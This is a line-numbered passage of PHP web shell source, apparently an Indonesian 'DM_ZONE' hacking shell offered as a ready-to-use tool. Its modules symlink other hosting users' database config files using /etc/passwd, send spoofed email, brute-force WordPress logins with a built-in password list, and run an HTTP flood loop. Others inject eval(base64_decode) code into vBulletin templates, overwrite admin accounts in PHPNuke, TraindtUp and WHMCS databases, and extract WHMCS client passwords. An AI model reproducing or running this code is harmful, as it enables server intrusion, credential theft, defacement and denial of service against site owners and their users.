  4652. $rs="/homez.114/".$us."/www/".$c;
  4653. $rs="/homez.115/".$us."/www/".$c;
  4654. $rs="/homez.116/".$us."/www/".$c;
  4655. $rs="/homez.117/".$us."/www/".$c;
  4656. $rs="/homez.118/".$us."/www/".$c;
  4657. $rs="/homez.119/".$us."/www/".$c;
  4658. $rs="/homez.120/".$us."/www/".$c;
  4659. $rs="/homez.121/".$us."/www/".$c;
  4660. $rs="/homez.122/".$us."/www/".$c;
  4661. $rs="/homez.123/".$us."/www/".$c;
  4662. $rs="/homez.124/".$us."/www/".$c;
  4663. $rs="/homez.125/".$us."/www/".$c;
  4664. $rs="/homez.126/".$us."/www/".$c;
  4665. $rs="/homez.127/".$us."/www/".$c;
  4666. $rs="/homez.128/".$us."/www/".$c;
  4667. $rs="/homez.129/".$us."/www/".$c;
  4668. $rs="/homez.130/".$us."/www/".$c;
  4669. $r="OVH/".$us."~".$c;
  4670. symlink($rs,$r);
  4671. }
  4672. }
  4673. }
  4674. }elseif(isset($_GET['x'])&&($_GET['x']=='litespeed')){
  4675. echo'<form action="?dm='.$pwd.'&amp;x=litespeed" method="post">
  4676. <body bgcolor=black><center><br/><br/> <img src="http://www.ftt.co.uk/images/nginx.png"><br/><img src="http://www.litespeedtech.com/images/litespeed/Subpage_misc/LSWS_logo.png">
  4677. <form method=post><br/><br/>
  4678. <b><span class="b7">O=:[ LITESPEED - NGINX TOOLS ]:=O</span></b><br/><br/>
  4679. <p><input type=submit name="usre" value="EXTRACT USER" /></form><br/><br/><br/>';
  4680. if(isset($_POST['usre'])){
  4681. echo'<form method=post>
  4682. <textarea cols=60 name=user>';
  4683. $users=file("/etc/passwd");
  4684. foreach($users as $user){
  4685. $str=explode(":",$user);
  4686. echo $str[0]."\n";
  4687. }
  4688. echo'</textarea><br><br>
  4689. <input type=submit name=su value="EXECUTE" /></form><br/>';
  4690. }
  4691. if(isset($_POST['su'])){
  4692. mkdir('litespeed',0777);
  4693. $rr="Options +FollowSymlinks\nOptions +IncludesNoExec -ExecCGI\nDirectoryIndex index.html index.shtml index.htm index.php\nRemoveHandler .php\nAddType text/html .shtml\nAddType application/octet-stream .php\nAddHandler server-parsed .shtml";
  4694. $g=fopen('litespeed/.htaccess','w');
  4695. fwrite($g,$rr);
  4696. $dm=symlink("/","litespeed/dm.shtml");
  4697. $rt="<a href=litespeed/dm.shtml><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  4698. echo "[~]&nbsp;";
  4699. echo "$rt";
  4700. $dir=mkdir('LITESPEED',0777);
  4701. $r="Options +FollowSymlinks\nOptions +IncludesNoExec -ExecCGI\nDirectoryIndex index.html index.shtml index.htm index.php\nRemoveHandler .php\nAddType text/html .shtml\nAddType application/octet-stream .php\nAddHandler server-parsed .shtml";
  4702. $f=fopen('LITESPEED/.htaccess','w');
  4703. fwrite($f,$r);
  4704. $consym="<a href=LITESPEED/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
  4705. echo "&nbsp;[~]&nbsp;";
  4706. echo "$consym";
  4707. echo "&nbsp;[~]";
  4708. $usr=explode("\n",$_POST['user']);
  4709. $configuration=array("aksi.php","aksi.php.old","aksi.php.bak","conf.php","conf.php.old","conf.php.bak","conf_global.php","conf_global.php.old","conf_global.php.bak","config.php","config.php.old","config.php.bak","configuration.php","configuration.php.old","configuration.php.bak","conn.php","conn.php.old","conn.php.bak","connect.php","connect.php.old","connect.php.bak","connection.php","connection.php.old","connection.php.bak","db.php","db.php.old","db.php.bak","database.php","database.php.old","database.php.bak","inc.php","inc.php.old","inc.php.bak","koneksi.php","koneksi.php.old","koneksi.php.bak","mysql.php","myqsl.php.old","mysql.php.bak","setting.php","setting.php.old","setting.php.bak","Settings.php","Settings.php.old","Settings.php.bak","sql.php","sql.php.old","sql.php.bak");
  4710. foreach($usr as $uss){
  4711. $us=trim($uss);
  4712. foreach($configuration as $c){
  4713. $rs="/home/".$us."/public_html/".$c;
  4714. $r="LITESPEED/".$us."~".$c;
  4715. symlink($rs,$r);
  4716. }
  4717. }
  4718. }
  4719. }elseif(isset($_GET['x'])&&($_GET['x']=='mail')){
  4720. if(isset($_POST['mail_send'])){
  4721. $mail_to=$_POST['mail_to'];
  4722. $mail_from=$_POST['mail_from'];
  4723. $mail_subject=$_POST['mail_subject'];
  4724. $mail_content=magicboom($_POST['mail_content']);
  4725. if(mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
  4726. $msg="email sent to $mail_to";
  4727. }else{
  4728. $msg="send email failed";
  4729. }
  4730. }
  4731. echo'<form action="?dm='.$pwd.'&amp;x=mail" method="post">
  4732. <br><br><table class="cmdbox">
  4733. <tr><td><textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea></td></tr>
  4734. <tr><td align="center">&nbsp;mail to <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp;</td></tr>
  4735. <tr><td align="center">&nbsp;from <input class="inputz" style="width:20%;" type="text" value="cPanel@ganteng.com" name="mail_from" />&nbsp;</td></tr>
  4736. <tr><td align="center">&nbsp;subject <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp;</td></tr>
  4737. <tr><td align="center">&nbsp;<input class="inputzbut" type="submit" name="mail_send" /></td></tr>
  4738. <tr><td align="center">&nbsp;&nbsp;&nbsp;&nbsp;'.$msg.'</td></tr>
  4739. </table></form>';
  4740. }elseif(isset($_GET['x'])&&($_GET['x']=='jumping')){
  4741. echo'<form action="?dm='.$pwd.'&amp;x=jumping" method="post">';
  4742. if($safemode) {
  4743. echo '<center><br/><br/><span class=b9>SAFE MODE ON</span><br/><br/></center>';
  4744. }
  4745. if(is_readable('/etc/passwd')) {
  4746. $passwd=fopen('/etc/passwd','r');
  4747. }else{
  4748. $passwd=fopen('/etc/passwd-','r');
  4749. }
  4750. if($passwd){
  4751. $pub=array();
  4752. $users=array();
  4753. $conf=array();
  4754. $i=0;
  4755. while(!feof($passwd)) {
  4756. $str=fgets($passwd);
  4757. if($i>10) {
  4758. $pos=strpos($str, ':');
  4759. $username=substr($str, 0,$pos);
  4760. $dirz='/home/'.$username.'/public_html/';
  4761. if($username!='') {
  4762. if(is_readable($dirz)) {
  4763. array_push($users,$username);
  4764. array_push($pub,$dirz);
  4765. }
  4766. }
  4767. }
  4768. $i++;
  4769. }
  4770. echo "<center><br/><br/><b><span class='b7'>O=:[ READABLE PUBLIC_HTML ]:=O</span></b><br/><br/><table cellpadding=\"4\" align='center' border='1' width='200' cellspacing='0' cellpadding='0' style='border-collapse:collapse'>
  4771. <tr><th><b>TOTAL:" . sizeof($pub)." TARGET VICTIM"."</th></tr>";
  4772. sort($users);
  4773. foreach($users as $user) {
  4774. $path="/home/$user/public_html/";
  4775. echo "<tr><td align=\"center\" style=\"white-space:nowrap;\"><a href='?dm=$path' target='_blank'>$path</td>";
  4776. }
  4777. echo "</tr></table></center>";
  4778. }else{
  4779. echo'<center><br/><br/><span class=b9>READ ETC/PASSWD- NOT AVAILABLE</span><br/><br/></center>';
  4780. }
  4781. }elseif(isset($_GET['x'])&&($_GET['x']=='domain')){
  4782. echo'<form action="?dm='.$pwd.'&amp;x=domain" method="post">
  4783. <center><br><br><b><span class="b7">O=:[ LIST DOMAIN ]:=O</span></b><br><br><div class=content>';
  4784. $file=implode(file("/etc/named.conf"));
  4785. if($file) {
  4786. preg_match_all("#named/(.*?).db#",$file,$r);
  4787. $domains=array_unique($r[1]);
  4788. echo "<table align=center border='1' style='border-collapse:collapse' cellpadding=\"4\">
  4789. <tr><td colspan=\"3\" align=\"center\">[+] ADA [ <b>" . count($domains)."</b> ] DOMAIN</td></tr>
  4790. <tr><td><b>Domain</b></td><td><b>User</b></td><td><b>Jumping</b></td></tr>";
  4791. sort($domains);
  4792. foreach($domains as $domain) {
  4793. $user=posix_getpwuid(fileowner("/etc/valiases/".$domain));
  4794. $usr=$user['name'];
  4795. echo "<tr><td><a href=\"http://$domain\" target=\"_blank\">$domain</a></td>\n<td><a href=\"http://$server_ip/~".$usr."\" target=\"_blank\">".$usr."</a></td>\n";
  4796. $tj="/home/$usr/public_html/";
  4797. if(is_readable($tj)){
  4798. echo"<td><a href=\"?dm=$tj\" target=\"_blank\"> Jumping </td></tr>\n";
  4799. }else{
  4800. echo"<td><span style=\"color:#ff0000;\"> Not Readable </span></tr>\n";
  4801. }
  4802. }
  4803. echo'</table></div></center>';
  4804. }else{
  4805. echo "<center>can't ReaD -> [ /etc/named.conf </center>";
  4806. }
  4807. }elseif(isset($_GET['x'])&&($_GET['x']=='crypter')){
  4808. echo'<form action="?dm='.$pwd.'&amp;x=crypter" method="post">';
  4809. $submit=$_POST['enter'];
  4810. $pass=$_POST['password'];
  4811. if(isset($submit)) {
  4812. $salt='}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
  4813. $hash=md5($pass);
  4814. $hash_md5=md5($salt . $pass);
  4815. $hash_md5_double=md5(sha1($salt . $pass));
  4816. $hash1=sha1($pass);
  4817. $hash1_sha1=sha1($salt . $pass);
  4818. $hash1_sha1_double=sha1(md5($salt . $pass));
  4819. }
  4820. echo '<table class="tabnet"><tr><th colspan="2">Password Hash</th></center></tr>';
  4821. echo '<tr><td><b>Masukan Kata:</b></td>';
  4822. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  4823. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  4824. echo '</td></tr>';
  4825. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  4826. echo '<tr><td>Original</td><td><input class=inputz type=text size=50 value=' . htmlentities($pass).'></td></tr>';
  4827. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr>';
  4828. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr>';
  4829. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr>';
  4830. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr>';
  4831. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr>';
  4832. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr></table>';
  4833.  
  4834. }elseif(isset($_GET['x'])&&($_GET['x']=='wp1')){?>
  4835. <form action="?dm=<?php echo $pwd; ?>&amp;x=wp1" method="post">
  4836. <center><br/><br/>
  4837. <form enctype="multipart/form-data" method="POST">
  4838. <table width='624' border='0' class='tabnet' id='Box'>
  4839. <tr><th colspan="5">Wordpress Brute Force</th></tr>
  4840. <tr><td >&nbsp;</td>
  4841. <td><p>Hosts:</p></td>
  4842. <td><p>Users:</p></td>
  4843. <td><p>Passwords:</p></td></tr>
  4844. <tr><td>&nbsp;</td>
  4845. <td ><textarea name="hosts" cols="30" rows="10" >
  4846. <?php
  4847. if($_POST) {
  4848. echo $_POST['hosts'];
  4849. }
  4850. ?></textarea></td>
  4851. <td><textarea name="usernames" cols="30" rows="10" ><?php
  4852. if($_POST) {
  4853. echo $_POST['usernames'];
  4854. }else{
  4855. echo "admin";
  4856. }
  4857. ?></textarea></td>
  4858. <td ><textarea name="passwords" cols="30" rows="10" >
  4859. <?php
  4860. if($_POST) {
  4861. echo $_POST['passwords'];
  4862. }else{
  4863. echo "admin\nadministrator\nadmin123\nqwerty\n123qwerty\nqwerty12345\n123admin\12345admin\nqwe123rty\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";
  4864. }
  4865. ?></textarea></td></tr>
  4866. <tr><td colspan="3" alig="center"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
  4867. <?php
  4868. if($_POST) {
  4869. $hosts=trim(filter($_POST['hosts']));
  4870. $passwords=trim(filter($_POST['passwords']));
  4871. $usernames=trim(filter($_POST['usernames']));
  4872. if($passwords&&$usernames&&$hosts) {
  4873. $hosts_explode=explode("\n",$hosts);
  4874. $usernames_explode=explode("\n",$usernames);
  4875. $passwords_explode=explode("\n",$passwords);
  4876. foreach($hosts_explode as $host) {
  4877. $host=RemoveLastSlash($host);
  4878. $hacked=0;
  4879. $host=str_replace(array(
  4880. "http://",
  4881. "https://",
  4882. "www."
  4883. ), "",trim($host));
  4884. $host="http://".$host;
  4885. $wpAdmin=$host.'/wp-admin/';
  4886. if(!url_exists($host."/wp-login.php")) {
  4887. echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";
  4888. ob_flush();
  4889. flush();
  4890. continue;
  4891. }
  4892. foreach($usernames_explode as $username) {
  4893. foreach($passwords_explode as $password) {
  4894. $ch=curl_init();
  4895. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4896. curl_setopt($ch, CURLOPT_URL,$host.'/wp-login.php');
  4897. curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
  4898. curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
  4899. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4900. curl_setopt($ch, CURLOPT_POST, TRUE);
  4901. curl_setopt($ch, CURLOPT_POSTFIELDS, "log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
  4902. $login=curl_exec($ch);
  4903. if(preg_match("profile.php",$login)) {
  4904. $hacked=1;
  4905. echo "<p>".$host." => UserName:[<font color='green'>".$username."</font>]:Password:[<font color='green'>".$password."</font>]</p>";
  4906. ob_flush();
  4907. flush();
  4908. break;
  4909. }
  4910. }
  4911. if($hacked==1) {
  4912. break;
  4913. }
  4914. }
  4915. if($hacked==0) {
  4916. echo "<p>".$host." => <font color='red'>Failed !</font></p>";
  4917. ob_flush();
  4918. flush();
  4919. }
  4920. }
  4921. }else{
  4922. echo "<p><font color='red'>All fields are Required ! </font></p>";
  4923. }
  4924. }
  4925. echo "</td></tr></table></form></center></p>";
  4926.  
  4927. }elseif(isset($_GET['x'])&&($_GET['x']=='jm1')){
  4928.  
  4929. }elseif(isset($_GET['x'])&&($_GET['x']=='phpddos')){?>
  4930. <form action="?dm=<?php echo $pwd; ?>&amp;x=phpddos" method="post">
  4931. <?php
  4932. echo'<p align="center">Address:<input class="inputz" name="urldd0" size="50"> Time:<input class="inputz" name="timedd0" size="6" value="40000"></b><br><input class="inputzbut"type=submit value=" Get Fire!!! "></form></p></table>';
  4933. if(isset($_GET['urldd0']) && (!empty($_GET['timedd0']))){
  4934. for($id=0;$id<$_GET['timedd0'];$id++){
  4935. $fp=null;
  4936. $contents=null;
  4937. $fp=fopen($_GET['urldd0'],"rb");
  4938. while(!feof($fp)){
  4939. $contents .= fread($fp,8192);
  4940. }
  4941. fclose($fp);
  4942. }
  4943. }
  4944. }elseif(isset($_GET['x'])&&($_GET['x']=='cf')){
  4945. echo '<center><br/><br/>
  4946. <form method="POST">
  4947. <select class="inputz" name="krz">
  4948. <option>FTP</option>
  4949. <option>DIRECT</option>
  4950. <option>WEBMAIL</option>
  4951. <option>CPANEL</option></select>
  4952. <input class="inputz" type="text" name="target" value="url">
  4953. <input class="inputzbut" type="submit" value=" >> "></center>';
  4954. $target=$_POST['target'];
  4955. if($_POST['krz']=="ftp") {
  4956. $ftp=gethostbyname("ftp."."$target");
  4957. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  4958. Ip Is:</font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
  4959. }
  4960. if($_POST['krz']=="direct-connect") {
  4961. $direct=gethostbyname("direct-connect."."$target");
  4962. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  4963. Ip Is:</font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
  4964. }
  4965. if($_POST['krz']=="webmail") {
  4966. $web=gethostbyname("webmail."."$target");
  4967. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  4968. Ip Is:</font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
  4969. }
  4970. if($_POST['krz']=="cpanel") {
  4971. $cpanel=gethostbyname("cpanel."."$target");
  4972. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  4973. Ip Is:</font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
  4974. }
  4975. }elseif(isset($_GET['x'])&&($_GET['x']=='vb1')){?>
  4976. <form action="?dm=<?php echo $pwd; ?>&amp;x=vb1" method="post">
  4977. <br><br><br><div align="center">
  4978. <?php
  4979. if(empty($_POST['index'])) {
  4980. echo "<center><form method=\"POST\">
  4981. DB Host:<input size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\"><br>
  4982. DB Name:<input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"database\" type=\"text\"><br>
  4983. DB User:<input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"username\" type=\"text\"><br>
  4984. DB Pass:<input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"password\" type=\"text\"><br>
  4985. <br>
  4986. <textarea name=\"index\" cols=\"100\" rows=\"20\">[+] HALAMAN INDEX DEFACE [+]</textarea><br>
  4987. <input value=\" >> \" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  4988. </form></center>";
  4989. }else{
  4990. $localhost=$_POST['localhost'];
  4991. $database=$_POST['database'];
  4992. $username=$_POST['username'];
  4993. $password=$_POST['password'];
  4994. $index=$_POST['index'];
  4995. @mysql_connect($localhost,$username,$password)or die(mysql_error());
  4996. @mysql_select_db($database)or die(mysql_error());
  4997. $index=str_replace("\'","'",$index);
  4998. $set_index="{\${eval(base64_decode(\'";
  4999. $set_index.=base64_encode("echo \"$index\";");
  5000. $set_index.="\'))}}{\${exit()}}</textarea>";
  5001. echo ("UPDATE template SET template ='".$set_index."' ");
  5002. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'")or die(mysql_error());
  5003. if($ok) {
  5004. echo "!! update finish !!<br><br>";
  5005. }
  5006. }
  5007. }elseif(isset($_GET['x'])&&($_GET['x']=='traindt')){?>
  5008. <form action="?dm=<?php echo $pwd; ?>&amp;x=traindt" method="post">
  5009. <?php
  5010. echo "<body><center>
  5011. <h2>^_^ DM_ZONE ^_^</h2>
  5012. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  5013. <form method=POST action=''>
  5014. DB HOST<br/>
  5015. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  5016. DB NAME<br/>
  5017. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  5018. DB USER<br/>
  5019. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  5020. DB PASSWORD<br/>
  5021. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  5022. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  5023. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  5024. NEW ADMIN LOGIN USER<br/>
  5025. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  5026. NEW ADMIN LOGIN PASS<br/>
  5027. <input value='dm' style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  5028. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  5029. $anu1=$_POST['anu1'];
  5030. $anu2=$_POST['anu2'];
  5031. $anu3=$_POST['anu3'];
  5032. $anu4=$_POST['anu4'];
  5033. @mysql_connect($anu1,$anu3,$anu4);
  5034. @mysql_select_db($anu2);
  5035. $idmaho=str_replace("\'","'",$idmaho);
  5036. $target_id=$_POST['idmaho'];
  5037. $userbaru=str_replace("\'","'",$userbaru);
  5038. $ganti_user=$_POST['userbaru'];
  5039. $passbaru=str_replace("\'","'",$passbaru);
  5040. $hash_pass=$_POST['passbaru'];
  5041. $ganti_pass=md5($hash_pass);
  5042. $sodok1="UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  5043. $sodok2="UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  5044. $oke=@mysql_query($sodok1);
  5045. $oke=@mysql_query($sodok2);
  5046. if($oke) {
  5047. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  5048. }
  5049. }elseif(isset($_GET['x'])&&($_GET['x']=='nuke')){?>
  5050. <form action="?dm=<?php echo $pwd; ?>&amp;x=nuke" method="post">
  5051. <?php
  5052. echo "<body><center>
  5053. <h2>^_^ DM_ZONE ^_^</h2>
  5054. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  5055. <form method=POST action=''>
  5056. DB HOST<br/>
  5057. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  5058. DB NAME<br/>
  5059. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  5060. DB USER<br/>
  5061. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  5062. DB PASSWORD<br/>
  5063. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  5064. <hr style='color:lime;'>
  5065. TARGET PREFIX<br/>
  5066. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  5067. NEW ADMIN LOGIN USER<br/>
  5068. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  5069. NEW ADMIN LOGIN PASS<br/>
  5070. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  5071. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  5072. $anu1=$_POST['anu1'];
  5073. $anu2=$_POST['anu2'];
  5074. $anu3=$_POST['anu3'];
  5075. $anu4=$_POST['anu4'];
  5076. @mysql_connect($anu1,$anu3,$anu4);
  5077. @mysql_select_db($anu2);
  5078. $userbaru=str_replace("\'","'",$userbaru);
  5079. $ganti_user=$_POST['userbaru'];
  5080. $passbaru=str_replace("\'","'",$passbaru);
  5081. $hash_pass=$_POST['passbaru'];
  5082. $ganti_pass=md5($hash_pass);
  5083. $prefix=$_POST['prefix'];
  5084. $table_name1=$prefix."users";
  5085. $table_name2=$prefix."authors";
  5086. $okenuke1="UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
  5087. $okenuke2="UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  5088. $okenuke3="UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
  5089. $okenuke4="UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  5090. $oke=@mysql_query($okenuke1);
  5091. $oke=@mysql_query($okenuke2);
  5092. $oke=@mysql_query($okenuke3);
  5093. $oke=@mysql_query($okenuke4);
  5094. if($oke) {
  5095. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  5096. }
  5097. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs9')){?>
  5098. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs9" method="post">
  5099. <p><br/><body>
  5100. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b><br/><br/>
  5101. <table border=1 style="border-collapse: collapse">
  5102. <tr><td>Hosting Site </td><td><input type="text" size="60" value="http://" name="url"></td></tr>
  5103. <tr><td align="center" colspan="2"><input class=submit type="submit" value=" HAJAR BOS " name="plapon"></td></tr></table>
  5104. <br></form></center>
  5105. <?php
  5106. if(isset($_POST['plapon'])) {
  5107. $target=$_POST['url'];
  5108. $bukadikitjoss=fopen("$target/?licensedebug","r");
  5109. $hasil='';
  5110. while(!feof($bukadikitjoss)) {
  5111. $hasil.=fread($bukadikitjoss, 8192);
  5112. }
  5113. echo "<center><textarea cols='40' rows='15'>$hasil</textarea>";
  5114. }
  5115. echo "</table>";
  5116. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs1')){?>
  5117. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs1" method="post">
  5118. <p><br/><body>
  5119. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><b><span class="b7">O=:[ GRAB PASSWORD CLIENT HOSTING ]:=O</span></b><br/><br/>
  5120. <table border=1 style="border-collapse: collapse">
  5121. <tr><td>db_host </td><td><input type="text" size="60" name="anu1" value="localhost"></td></tr>
  5122. <tr><td>db_username </td><td><input type="text" size="60" name="anu2"></td></tr>
  5123. <tr><td>db_password</td><td><input type="text" size="60" name="anu3"></td></tr>
  5124. <tr><td>db_name</td><td><input type="text" size="60" name="anu4"></td></tr>
  5125. <tr><td align="center" colspan="2"><input class=submit type="submit" value=" HAJAR BOS " name="plapon"></td></tr>
  5126. </table>
  5127. <br></form></center>
  5128. <?php
  5129. if(isset($_POST['plapon'])) {
  5130. $perawan=$_POST['anu1'];
  5131. $kimcil=$_POST['anu2'];
  5132. $janda=$_POST['anu3'];
  5133. $hotel=$_POST['anu4'];
  5134. @mysql_connect($perawan,$kimcil,$janda);
  5135. @mysql_select_db($hotel)or die("Gagal Koneksi Ke Database");
  5136. $query="select subject,message from tblemails";
  5137. $result=mysql_query($query);
  5138. mysql_close();
  5139. $num=mysql_numrows($result);
  5140. $i=0;
  5141. while($i<$num) {
  5142. $css=mysql_result($result,$i, "subject");
  5143. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  5144. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  5145. <th align='center'><b>CLIENT EMAIL</b></th>
  5146. <th align='center'><b>CLIENT PASSWORD</b></th>
  5147. </tr>";
  5148. if(stristr($css, "Welcome")) {
  5149. $s=mysql_result($result,$i, "message");
  5150. if(stristr($s, "Login Username: ")or stristr($s, "Email Address: ")) {
  5151. $mail=get_string_between($s, "Login Username: ","<br />");
  5152. $m2=get_string_between($s, "Email Address: ","<br />");
  5153. $pass=get_string_between($s, "Password: ","</p>");
  5154. print $mail . $m2.":".$pass."<br>";
  5155. echo "<tr>
  5156. <td align='center'>$mail.$m2.</td>
  5157. <td align='center'>".$pass."</td>
  5158. </tr>";
  5159. }
  5160. }
  5161. ++$i;
  5162. }
  5163. }
  5164. echo "</table>";
  5165. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs3')){?>
  5166. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs3" method="post">
  5167. <p><br/><body>
  5168. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><b><span class="b7">O=:[ PASSWORD CHANGER ]:=O</span></b><br/><br/>
  5169. <table border=1 style="border-collapse: collapse">
  5170. <tr><td>db_host </td><td><input type="text" size="80" name="anu1" value="localhost"></td></tr>
  5171. <tr><td>db_username </td><td><input type="text" size="80" name="anu2"></td></tr>
  5172. <tr><td>db_password</td><td><input type="text" size="80" name="anu3"></td></tr>
  5173. <tr><td>db_name</td><td><input type="text" size="80" name="anu4"></td></tr>
  5174. <tr><td>id_admin</td><td><input type="text" size="80" value="1" name="idmaho"></td></tr>
  5175. <tr><td>new_username</td><td><input type="text" size="80" value="hacker" name="userbaru"></td></tr>
  5176. <tr><td>new_password</td><td><input type="text" size="80" value="hackerpassword" name="passbaru"></td></tr>
  5177. <tr><td align="center" colspan="2"><input class=submit type="submit" value=" HAJAR BOS " name="plapon"></td></tr>
  5178. </table>
  5179. <br>
  5180. </form>
  5181. </center>
  5182. <?php
  5183. if(isset($_POST['plapon'])) {
  5184. $anu1=$_POST['anu1'];
  5185. $anu2=$_POST['anu2'];
  5186. $anu3=$_POST['anu3'];
  5187. $anu4=$_POST['anu4'];
  5188. @mysql_connect($anu1,$anu2,$anu3);
  5189. @mysql_select_db($anu4);
  5190. $idmaho=str_replace("\'","'",$idmaho);
  5191. $target_id=$_POST['idmaho'];
  5192. $userbaru=str_replace("\'","'",$userbaru);
  5193. $ganti_user=$_POST['userbaru'];
  5194. $passbaru=str_replace("\'","'",$passbaru);
  5195. $hash_pass=$_POST['passbaru'];
  5196. $ganti_pass=md5($hash_pass);
  5197. $colox="UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  5198. $coloxx="UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  5199. $udah_ganteng=@mysql_query($colox);
  5200. $udah_ganteng=@mysql_query($coloxx);
  5201. if($udah_ganteng) {
  5202. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  5203. }
  5204. }
  5205. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs2')){?>
  5206. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs2" method="post">
  5207. <p><br/><body>
  5208. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><b><span class="b7">O=:[ INJECT SHELL ]:=O</span></b><br/><br/>
  5209. <table border=1 style="border-collapse: collapse">
  5210. <tr><td>db_host </td><td><input type="text" size="80" name="anu1" value="localhost"></td></tr>
  5211. <tr><td>db_username </td><td><input type="text" size="80" name="anu2"></td></tr>
  5212. <tr><td>db_password</td><td><input type="text" size="80" name="anu3"></td></tr>
